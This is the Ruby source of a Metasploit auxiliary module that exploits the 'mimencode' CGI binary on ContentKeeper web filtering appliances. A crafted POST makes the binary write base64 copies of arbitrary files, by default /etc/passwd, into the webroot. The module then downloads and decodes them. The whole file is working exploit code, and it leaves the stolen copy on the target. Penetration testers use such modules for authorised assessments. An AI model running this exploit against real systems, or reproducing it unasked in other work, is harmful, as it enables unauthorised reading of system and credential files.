GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
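class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and the two options run_host reads:
  # FILE (the path requested from the appliance) and URL (the path to mimencode).
  def initialize
    super(
      'Name' => 'ContentKeeper Web Appliance mimencode File Access',
      'Description' => %q{
        This module abuses the 'mimencode' binary present within
        ContentKeeper Web filtering appliances to retrieve arbitrary
        files outside of the webroot.
      },
      'References' => [
        [ 'OSVDB', '54551' ],
        [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
      ],
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE
    )

    register_options(
      [
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
        OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
      ]
    )
  end

  # Sends the mimencode request for datastore['FILE'] to one host, then fetches
  # the temp file it named and prints the base64-decoded body on HTTP 200.
  #
  # @param _ip [String] target address (unused; rhost/rport come from HttpClient)
  # @return [void]
  def run_host(_ip)
    # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.
    tmpfile = Rex::Text.rand_text_alphanumeric(20)

    print_status("Attempting to connect to #{rhost}:#{rport}")

    # The query string asks mimencode to write its output under /home/httpd/html/
    # as <tmpfile>; a 500 on this POST is what the module treats as success.
    res = send_request_raw(
      {
        'method' => 'POST',
        'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE']
      }, 25
    )

    if res && res.code == 500
      print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")

      # NOTE: the encoded copy written under the webroot is not removed by this
      # module; it stays retrievable as /<tmpfile> until cleaned up on the appliance.
      file = send_request_raw(
        {
          'method' => 'GET',
          'uri' => '/' + tmpfile
        }, 25
      )

      if file && file.code == 200
        print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
      elsif file && file.code
        # Report the GET's own status and body; previously this branch printed
        # the earlier POST response (res), which is always 500 here.
        print_error("Attempt returned HTTP error #{file.code} on #{rhost}:#{rport} Response: \r\n#{file.body}")
      end
    elsif res && res.code
      print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
    end
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    # Host not reachable: deliberately swallowed so the method returns quietly.
  rescue ::Timeout::Error, ::Errno::EPIPE
    # Slow or dropped connection: likewise swallowed.
  end
end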